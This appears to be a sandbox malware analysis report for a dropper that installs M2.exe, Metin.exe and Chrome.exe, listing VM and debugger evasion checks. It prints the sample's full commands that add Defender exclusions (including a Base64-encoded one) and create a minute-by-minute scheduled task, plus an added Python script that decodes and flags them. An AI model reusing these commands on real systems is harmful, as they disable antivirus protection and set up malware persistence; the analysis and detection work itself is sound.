                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                        Source: C:\Users\user\AppData\Roaming\Metin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController (4 identical entries)
                        Source: f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2542545307.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, Metin.exe, 00000009.00000000.1268593061.0000000000972000.00000002.00000001.01000000.00000007.sdmp, Metin.exe.1.dr, Chrome.exe.9.dr Binary or memory string: SBIEDLL.DLL
                        Source: C:\Users\user\AppData\Roaming\M2.exe Memory allocated: 2420000 memory reserve | memory write watch (2 identical entries)
                        Source: C:\Users\user\AppData\Roaming\M2.exe Memory allocated: 2630000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Metin.exe Memory allocated: 10C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Metin.exe Memory allocated: 1AC00000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Chrome.exe Memory allocated: 960000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Chrome.exe Memory allocated: 1A680000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Chrome.exe Memory allocated: 2C90000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Chrome.exe Memory allocated: 1AF10000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Chrome.exe Memory allocated: 2E30000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Chrome.exe Memory allocated: 1B0C0000 memory reserve | memory write watch
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Metin.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (4 identical entries)
                        Source: C:\Users\user\AppData\Roaming\Chrome.exe Thread delayed: delay time: 922337203685477 (3 identical entries)
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6275
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3304
                        Source: C:\Users\user\AppData\Roaming\Metin.exe Window / User API: threadDelayed 8744
                        Source: C:\Users\user\AppData\Roaming\Metin.exe Window / User API: threadDelayed 1063
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4942
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4895
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7078
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2485
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7876
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1752
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6797
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2809
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7472 | Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\user\AppData\Roaming\M2.exe TID: 8100 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Metin.exe TID: 1704 | Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6708 | Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3104 | Thread sleep count: 7876 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3128 | Thread sleep count: 1752 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4024 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 796 | Thread sleep count: 6797 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4444 | Thread sleep count: 2809 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4220 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Roaming\Chrome.exe TID: 6568 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Chrome.exe TID: 7164 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Chrome.exe TID: 5276 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS (2 occurrences)
Source: C:\Users\user\AppData\Roaming\Metin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (2 occurrences)
Source: C:\Users\user\AppData\Roaming\Metin.exe | File Volume queried: C:\ FullSizeInformation (5 occurrences)
Source: C:\Users\user\AppData\Roaming\Chrome.exe | File Volume queried: C:\ FullSizeInformation (3 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Metin.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (4 occurrences)
Source: C:\Users\user\AppData\Roaming\Chrome.exe | Thread delayed: delay time: 922337203685477 (3 occurrences)
Source: Chrome.exe.9.dr | Binary or memory string: vmware
Source: M2.exe, 00000006.00000002.2530123513.00000000007E6000.00000004.00000020.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2552335179.000000001B9D4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Roaming\Metin.exe | Code function: 9_2_00007FF7C1417585 CheckRemoteDebuggerPresent
Source: C:\Users\user\AppData\Roaming\Metin.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\M2.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Metin.exe | Process token adjusted: Debug (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (4 occurrences)
Source: C:\Users\user\AppData\Roaming\Chrome.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Code function: 1_2_004014D1 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit
Source: C:\Users\user\AppData\Roaming\M2.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\Metin.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe' (3 occurrences)
Source: C:\Users\user\AppData\Roaming\Metin.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Chrome.exe' (2 occurrences)
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Process created: Base64 decoded <#wcw#>Add-MpPreference <#mbb#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#hbv#> -Force <#xzz#> (2 occurrences)
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA="
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Process created: C:\Users\user\AppData\Roaming\M2.exe "C:\Users\user\AppData\Roaming\M2.exe"
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Process created: C:\Users\user\AppData\Roaming\Metin.exe "C:\Users\user\AppData\Roaming\Metin.exe"
Source: C:\Users\user\AppData\Roaming\Metin.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe'
Source: C:\Users\user\AppData\Roaming\Metin.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Metin.exe'
Source: C:\Users\user\AppData\Roaming\Metin.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Chrome.exe'
Source: C:\Users\user\AppData\Roaming\Metin.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome.exe'
Source: C:\Users\user\AppData\Roaming\Metin.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe"
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajahcaywb3acmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajag0aygbiacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajaggaygb2acmapgagac0argbvahiaywblacaapaajahgaegb6acmapga=" (2 occurrences; a case-folded copy of the -EncodedCommand line above, and base64 is case-sensitive, so this form no longer decodes)
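The rows above show the two ways this sample adds Windows Defender exclusions (an -EncodedCommand whose UTF-16LE payload is padded with <#...#> block comments, and plain -ExecutionPolicy Bypass Add-MpPreference calls for -ExclusionPath and -ExclusionProcess) plus an every-minute schtasks entry with /RL HIGHEST. The Python below is an added triage example, not part of the Joe Sandbox report or of the sample: it decodes the encoded command, strips the comment filler, extracts each exclusion type and value, flags exclusions that cover the user profile or a whole drive, and scores the scheduled task. The three command lines it parses are copied from the rows above; all function, constant and regex names are the example's own, and treating a missing /mo as 1 is this example's assumption.

```python
"""Triage of the Defender-exclusion and schtasks command lines seen in this report.

Added example, not part of the Joe Sandbox report or of the sample. The three
command lines below are copied from the HIPS / PFW rows above; every function,
constant and regex name is the example's own.
"""
import base64
import re
from typing import Optional

# powershell.exe accepts any unambiguous prefix of a switch: -e, -ec, -enc ...
# all mean -EncodedCommand, and -ex, -exec ... all mean -ExecutionPolicy.
ENCODED_FLAGS = {"encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)}
EXECPOLICY_FLAGS = {"executionpolicy"[:i] for i in range(2, len("executionpolicy") + 1)}

TOKEN_RE = re.compile(r'"[^"]*"|\S+')        # a double-quoted token or a bare word
COMMENT_RE = re.compile(r"<#.*?#>", re.S)    # block comments inserted as filler
EXCLUSION_RE = re.compile(
    r"(?i)\b(?:Add|Set)-MpPreference\b.*?-Exclusion(Path|Process|Extension|IpAddress)\s+(\S+)"
)
# Excluding a whole drive or the user profile switches Defender off in practice
BROAD_RE = re.compile(r"(?i)\$env:(?:SystemDrive|UserProfile|SystemRoot)|^[A-Z]:\\?$")
USER_WRITABLE_RE = re.compile(r"(?i)\\AppData\\|\\Temp\\|\\Users\\Public\\|\\ProgramData\\")

# Constructed input: copied from the "Process created" rows of this report.
ENCODED_CMDLINE = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA="'
PLAIN_CMDLINE = (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass '
                 r"Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe'")
SCHTASKS_CMDLINE = (r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 '
                    r'/tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe"')


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries UTF-16LE text in base64; None if the token is not that."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def strip_comments(script: str) -> str:
    """Drop <# ... #> filler and collapse whitespace so the real cmdlet is visible."""
    return " ".join(COMMENT_RE.sub(" ", script).split())


def triage_powershell(cmdline: str) -> dict:
    """Flag encoded commands, execution-policy bypass and Defender exclusions."""
    tokens = [t.strip('"') for t in TOKEN_RE.findall(cmdline)]
    result = {"encoded": False, "decoded": None, "bypass": False, "exclusions": [], "broad": False}
    script = cmdline  # text searched for cmdlets; replaced by the decoded payload if present
    for i, tok in enumerate(tokens[:-1]):
        switch = tok[1:].lower() if tok.startswith("-") else ""
        if switch in ENCODED_FLAGS:
            result["encoded"] = True
            decoded = decode_encoded_command(tokens[i + 1])
            if decoded is not None:
                script = result["decoded"] = strip_comments(decoded)
        elif switch in EXECPOLICY_FLAGS and tokens[i + 1].lower() == "bypass":
            result["bypass"] = True
    for kind, value in EXCLUSION_RE.findall(script):
        value = value.strip("'\"")  # quoted values without spaces, as in this sample
        result["exclusions"].append((kind, value))
        result["broad"] = result["broad"] or bool(BROAD_RE.search(value))
    return result


def triage_schtasks(cmdline: str) -> dict:
    """Flag an every-minute, highest-privilege task whose action lives in a user-writable path."""
    tokens = [t.strip('"') for t in TOKEN_RE.findall(cmdline)]
    lower = [t.lower() for t in tokens]

    def value_of(switch: str) -> Optional[str]:
        # schtasks switches are case-insensitive and take the next token as their value
        i = lower.index(switch) if switch in lower else -1
        return tokens[i + 1] if 0 <= i < len(tokens) - 1 else None

    action = value_of("/tr") or ""
    result = {
        "task": value_of("/tn"),
        "action": action,
        # a missing /mo is treated as 1 here (this example's assumption)
        "every_minute": (value_of("/sc") or "").lower() == "minute" and (value_of("/mo") or "1") == "1",
        "highest": (value_of("/rl") or "").lower() == "highest",
        "user_writable": bool(USER_WRITABLE_RE.search(action)),
    }
    result["suspicious"] = result["every_minute"] and result["user_writable"]
    return result


if __name__ == "__main__":
    for line in (ENCODED_CMDLINE, PLAIN_CMDLINE):
        print(triage_powershell(line))
    print(triage_schtasks(SCHTASKS_CMDLINE))
```

Two caveats worth keeping in mind when running this over real telemetry: base64 is case-sensitive, so a case-folded command line (such as the Sigma rows above) cannot be decoded, which is why the example still raises the encoded flag from the switch alone; and the tokenizer only handles single-quoted values without embedded spaces, which is all this sample uses.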
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (6 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
